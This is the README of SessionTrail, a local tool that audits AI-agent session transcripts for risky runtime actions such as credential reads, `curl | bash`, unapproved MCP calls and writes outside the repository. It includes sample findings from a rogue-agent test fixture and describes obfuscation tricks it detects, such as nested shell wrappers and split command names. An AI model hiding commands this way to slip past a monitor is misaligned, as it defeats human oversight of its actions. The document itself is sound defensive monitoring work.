Conalh/SessionTrail

GitHub: Conalh/SessionTrail

SessionTrail 是一款纯本地运行的 CLI 工具，通过审计 AI agent 的 JSONL 会话记录来检测和报告运行时的高风险行为。

Stars: 0 | Forks: 0

# SessionTrail [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Language: TypeScript](https://img.shields.io/badge/language-TypeScript-3178c6.svg)](package.json) [![Local-only](https://img.shields.io/badge/local--only-uploads%20nothing-2ea44f.svg)](#how-it-works) [![Release](https://img.shields.io/github/v/release/Conalh/SessionTrail)](https://github.com/Conalh/SessionTrail/releases) **一个用于 AI-agent 会话的记录行为审查工具。** SessionTrail 会读取 Cursor、Claude Code 和 Codex 的 JSONL 记录，并标记出 agent 实际尝试执行的操作：读取凭证、`curl | sh`、未知的 MCP server、跨会话窥探、网络请求以及在 repo 外部的写入。 Prompt 和 PR diff 只能展示意图和输出。而记录则展示了运行时行为。SessionTrail 将这些本地的 JSONL 轨迹转化为结构化的报告，您可以对其进行审查、设置门控，或与 agent-gov 套件的其他工具合并。 ``` flowchart LR Cursor["Cursor JSONL"] --> Trail Claude["Claude Code JSONL"] --> Trail Codex["Codex JSONL"] --> Trail Repo["Declared repo root
allowlist config"] --> Trail Trail[("SessionTrail
runtime behavior audit")] --> Report["Review output
annotations · markdown · JSON · SARIF"] Report --> Reviewer["Reviewer sees
what the agent attempted"] classDef input fill:#1e293b,stroke:#334155,color:#e2e8f0 classDef engine fill:#0f172a,stroke:#1e293b,color:#e2e8f0,stroke-width:2px classDef output fill:#0c4a6e,stroke:#0369a1,color:#e0f2fe class Cursor,Claude,Codex,Repo input class Trail engine class Report,Reviewer output ``` **另请参阅：** [AgentPulse](https://github.com/Conalh/AgentPulse) 用于实时轨迹监控 · [GovVerdict](https://github.com/Conalh/GovVerdict) 用于生成合并的套件裁定 · [agent-gov-core](https://github.com/Conalh/agent-gov-core) 用于共享的报告 schema。 ## 适用场景 SessionTrail 是一个**事后**审计工具 —— 它审查 agent 已经生成的记录，而不是 diff 或配置。 | 工具 | 输入 | 捕获/决定 | 输出 | 适用场景 | |---|---|---|---|---| | [warden](https://github.com/Conalh/warden) | policy + tool action | 允许 / 拒绝 / 询问 | 裁定 | 您需要确定性的运行时 policy 决策 | | [barbican](https://github.com/Conalh/barbican) | MCP tools/list + tools/call | 拒绝的调用、询问处理、工具投毒 | 强制执行的 MCP 代理 + 报告 | 您需要 MCP 运行时强制执行 | | [ScopeTrail](https://github.com/Conalh/ScopeTrail) | PR base/head agent 配置 | 权限/配置漂移 | 注解 + 报告 | PR 更改了 agent 配置 | | [PolicyMesh](https://github.com/Conalh/PolicyMesh) | 当前 repo policy/配置文件 | 跨 agent 表面的冲突规则 | 报告 / SARIF | 当前 policy 不一致 | | [CapabilityEcho](https://github.com/Conalh/CapabilityEcho) | PR diff | 新的可执行能力 | 注解 + 报告 | 代码获得了网络/子进程/eval/生命周期/工作流权限 | | [TaskBound](https://github.com/Conalh/TaskBound) | 声明的任务 + PR diff | 范围蔓延 | 注解 + 报告 | agent 可能偏离了任务 | | **SessionTrail** | Cursor/Claude/Codex JSONL 记录 | 有风险的运行时行为 | 报告 / SARIF | agent 会话已经运行 | | [GovVerdict](https://github.com/Conalh/GovVerdict) | JSON 报告 | 去重后的套件裁定 | 合并的报告 | 您想要一个最终的审查裁定 | | [AgentPulse](https://github.com/Conalh/AgentPulse) | 实时会话事件 | 轨迹状态 | 终端仪表板 | 您想要实时的会话观察 | | [agent-gov-core](https://github.com/Conalh/agent-gov-core) | 共享的 schema/解析器 | 通用的 Finding/Report 模型 | 库 | 工具需要共享的报告原语 | ## 为什么会有这个工具 AI agent 经常会做一些它的 prompt 根本没有要求的事情：打开 `~/.ssh/id_rsa`、读取另一个会话的记录、从网络管道接入一个 shell 安装程序，或者调用一个没人批准的 MCP server。运行时日志以纯 JSONL 格式记录了这些工具调用，但很少有团队会去阅读它们。 SessionTrail 的存在是为了让运行时行为在会话结束后变得可审查。它专注于**工具意图**：即根据 agent 运行时的记录，agent 尝试做了什么。 ## 它能捕获什么 | 行为类别 | 示例 | | --- | --- | | **Repo 外访问** | 在 `--repo` 之外的读取/写入，包括主目录元数据和广泛的路径扫描。 | | **特权路径** | `.ssh`、`.aws`、`.kube`、`.gnupg`、`/etc/shadow` 以及 agent 元数据目录。 | | **高风险 shell 意图** | `curl | sh`、publish 命令、广泛的删除、push 操作以及混淆的 shell pipeline。 | | **运行时集成** | MCP 调用、外部网络意图、subagent 生成、跨会话记录访问。 | ## 快速开始 ``` git clone https://github.com/Conalh/SessionTrail.git cd SessionTrail npm install npm run bundle node bundle/index.js audit \ --transcript test/fixtures/rogue-session.jsonl \ --repo C:/Dev/Demo \ --format markdown ``` 该命令会针对内置的恶意 agent 测试用例运行并报告 `CRITICAL`。将 `--transcript` 替换为真实的 Cursor / Claude Code / Codex JSONL 文件来审计您自己的会话，或者使用 `--transcript-dir` 扫描整个目录下的记录。 ## 输出示例 ``` SessionTrail behavior review: CRITICAL Agent runtimes: cursor x9 Parsed: 10 lines, 9 events Summary: home or Cursor metadata access; reads outside the repository; cross-session transcript reads; broad home-directory scans; shell command invocations; MCP tool invocations; external network requests; subagent spawns; writes outside the repository [HIGH] Home directory access: agent read C:/Users/conno/.cursor/plans/demo.plan.md [MEDIUM] Read outside repository: C:/Users/conno/.cursor/plans/demo.plan.md [MEDIUM] Cross-session transcript read: .../old-session/old-session.jsonl [HIGH] Broad path scan: agent scanned a very broad home-directory path [HIGH] Shell command: curl https://example.com/install.sh | bash [MEDIUM] MCP tool invoked: cursor-app-control/move_agent_to_root [MEDIUM] Network request via WebFetch: https://example.com/bootstrap [LOW] Subagent spawned: explore [CRITICAL] Write outside repository: agent attempted to write outside the declared repository root ``` `--format json` 会输出标准的 `agent-gov-core` Report 封装。每个条目都符合共享的 `Finding` schema，因此 SessionTrail 的输出可以通过 GovVerdict 与套件中的其他工具完美组合： ``` { "schemaVersion": "1.0", "tool": "session_trail", "rating": "critical", "findings": [ { "tool": "session_trail", "kind": "session_trail.shell_command_invoked", "severity": "high", "message": "Shell command: curl https://example.com/install.sh | bash", "location": { "file": "test/fixtures/rogue-session.jsonl", "line": 7 }, "fingerprint": "..." } ], "data": { "toolInvocationCount": 9, "uniqueToolCount": 7, "runtimeUsage": { "cursor": 9 } } } ``` ## 工作原理 - 完全在您的本地机器上针对本地 JSONL 记录文件运行。**默认不上传任何数据** —— 没有托管扫描器，没有遥测，也不需要账户。 - 将 Cursor（`tool_use` 块）、Claude Code（带有每条消息 `cwd` 的 `tool_use` 块）和 Codex（`response_item` 函数调用）的记录解析为标准化的工具事件流。 - 根据一组固定的行为检测器对每个事件进行评分，涵盖 **12 种发现类型**：在 `--repo` 之外的读取和写入、特权路径、主目录和 agent 元数据目录、跨会话记录访问、对用户根目录的广泛扫描、高风险的 shell pipeline、MCP 调用、外部网络意图以及 subagent 生成 —— 此外还包括下文提到的覆盖盲区信号。 - **透过混淆读取 shell 意图。** 命令会被深度分词 —— 嵌套在 `bash -c "…"`、`$(…)` 和反引号中的 payload 会被递归展平，并且动词头部会被标准化（`c""url`、`c\url` 以及 `sudo`/`env` 包装器会被剥离） —— 因此高风险的动词无法通过隐藏在包装器内部来逃避检测。`curl … | sh`、`npm publish`、`rm -rf` 和 `git push` 等形式总是会提升严重级别，且**无法被加入白名单**。 - **覆盖盲区不会被读取为干净状态。** 当解析器跳过格式错误的记录行，或者目录模式下的记录文件超过了输入字节上限时，这将作为 `parse_lines_skipped` 或 `transcript_file_skipped` 呈现出来 —— 截断的、损坏的或过大的记录输入会报告该盲区，而不是伪装成一个干净的会话。 - 使用来自 [agent-gov-core](https://github.com/Conalh/agent-gov-core) 的标准 `Finding` schema 发出发现结果，并为每个发现提供稳定的指纹，以便跨工具去重和 SARIF 去重都能正常工作。当不同运行时之间存在稳定的记录字段时，被拒绝的操作、工具结果和批准结果将被纳入分析。 ## 值得关注的设计选择 - **记录优先。** SessionTrail 审查的是运行时记录的内容，而不是 prompt 声称的内容或最终的 diff 包含的内容。 - **运行时标准化。** Cursor、Claude Code 和 Codex 事件在检测之前会被标准化为一个统一的工具事件流。 - **可见的白名单。** `.sessiontrail.json` 可以降低预期行为的严重级别，但是诸如 `curl | sh`、`npm publish`、`rm -rf` 和 `git push` 等高风险模式无法被隐藏。 - **套件化输出。** JSON 使用共享的 `Finding` 契约，因此 GovVerdict 可以将其与静态的 PR 阶段工具合并。 - **经过测试。** 67 个测试（`npm test`）涵盖了所有三种记录格式、每种发现类型、shell 去嵌套和动词头部混淆、白名单优先级，以及 ReDoS 和同形异义主机防护。 ## 选项 CLI 参数（`sessiontrail audit ...`）： | 参数 | 默认值 | 用途 | | --- | --- | --- | | `--transcript ` | — | 要审计的单个 JSONL 记录。 | | `--transcript-dir ` | — | 审计目录中的每个 JSONL 文件。与 `--transcript` 互斥。 | | `--repo ` | `cwd` | 用于判断是 repo 内行为还是 repo 外行为的仓库根目录。作为字符串进行比较，因此可以在 Linux runner 上审查 Windows 记录的记录文件。 | | `--format` | `text` | `text`、`markdown`、`json`、`github` 或 `sarif`。 | | `--json-out ` | — | 同时将 JSON 报告写入文件。 | | `--markdown-out ` | — | 同时将 Markdown 报告写入文件。 | | `--sarif-out ` | — | 同时写入可通过 `github/codeql-action/upload-sarif` 上传的 SARIF 2.1.0 报告。 | | `--config ` | `/.sessiontrail.json` | 白名单文件。在 monorepo 中，如果审计根目录不是配置文件所在的位置，这会非常有用。 | | `--fail-on` | `none` | 当会话评级达到 `low`、`medium`、`high` 或 `critical` 时以退出码 1 退出。 | ### 白名单 (`.sessiontrail.json`) 在 repo 根目录放置一个此文件来声明预期行为。匹配的发现会降级为 `low` —— 在报告中可见，但不足以触发 `--fail-on medium`。高风险模式检测始终具有最高优先级，且**无法**被加入白名单。白名单会将其自身的输入视为不受信任，因为在 `pull_request` 工作流中，PR 可能会携带一个恶意的 `.sessiontrail.json`。具有嵌套无界量词形式（`(a+)+`）的用户正则表达式会在编译阶段被拒绝，并且传递给每个正则表达式的输入被限制在 4 KB 以内，因此 PR 无法将灾难性回溯模式与长命令配对来卡死 runner。`allowedNetworkHosts` 会使用精确匹配或点号后缀规则与解析后的 URL 主机名进行匹配，因此 `internal.example.com.evil.test` **不会**匹配被加入白名单的 `internal.example.com`。 ``` { "allowedMcpServers": ["github-pr-helper"], "benignShellPatterns": ["^cargo\\s+test", "^deno\\s+task\\s+\\w+$"], "allowedNetworkHosts": ["internal.example.com"] } ``` 请参阅 [`.sessiontrail.json.example`](.sessiontrail.json.example) 获取可直接复制的入门示例。 ### GitHub Action ``` - uses: actions/checkout@v6 - uses: Conalh/SessionTrail@v0.6.4 with: transcript: path/to/session.jsonl repo: . fail-on: none ``` Action 输出：`rating`、`finding-count`、`tool-invocation-count`、`unique-tool-count`、`runtime-count`、`sarif-file`。将 `sarif-file` 串联到 `github/codeql-action/upload-sarif` 中，即可在 Security 选项卡中展示发现结果。该 action 默认不上传任何内容 —— 它会从工作区读取记录，将 Markdown 报告写入步骤摘要，并输出具有严重级别感知的内联注解。 ## agent-gov 套件的一部分这些仅限本地使用的开源工具用于审查 AI-agent 的 PR 和编码会话，以发现配置漂移、policy 不匹配和范围蔓延。选择与失败模式相匹配的工具；通过 GovVerdict 进行组合。 | Repo | 捕获内容 | | --- | --- | | [ScopeTrail](https://github.com/Conalh/ScopeTrail) | PR base 和 head 之间的 Agent 配置漂移。 | | [PolicyMesh](https://github.com/Conalh/PolicyMesh) | 导致行为无法重现的冲突的 agent 指令和配置漂移。 | | [CapabilityEcho](https://github.com/Conalh/CapabilityEcho) | 由代码、清单、工作流和 Dockerfile 引入的能力漂移。 | | [TaskBound](https://github.com/Conalh/TaskBound) | 声明任务与实际 diff 之间的范围蔓延。 | | **SessionTrail** *(本 repo)* | Cursor / Claude Code / Codex 会话记录中的高风险运行时行为。 | | [AgentPulse](https://github.com/Conalh/AgentPulse) | 针对活动 agent 会话的实时本地轨迹裁定。 | | [GovVerdict](https://github.com/Conalh/GovVerdict) | 将上述工具生成的 JSON 报告合并为一个去重后的审查报告。 | | [agent-gov-core](https://github.com/Conalh/agent-gov-core) | 共享的解析器、标准的 `Finding` schema 和 `mergeFindings`。 | | [agent-gov-demo](https://github.com/Conalh/agent-gov-demo) | 带有一个会触发所有五个审查工具的恶意 PR 的演示沙箱。 | 查看整个技术栈如何在一个恶意 PR 上发挥作用：**[agent-gov-demo#1](https://github.com/Conalh/agent-gov-demo/pull/1)**。 MIT。欢迎通过 [Issues](https://github.com/Conalh/SessionTrail/issues) 提交 Bug 告和误报报告。

标签：AI智能体, GitHub Action, MITM代理, TypeScript, 云安全监控, 会话审计, 安全合规, 安全插件, 网络代理, 自动化攻击, 静态分析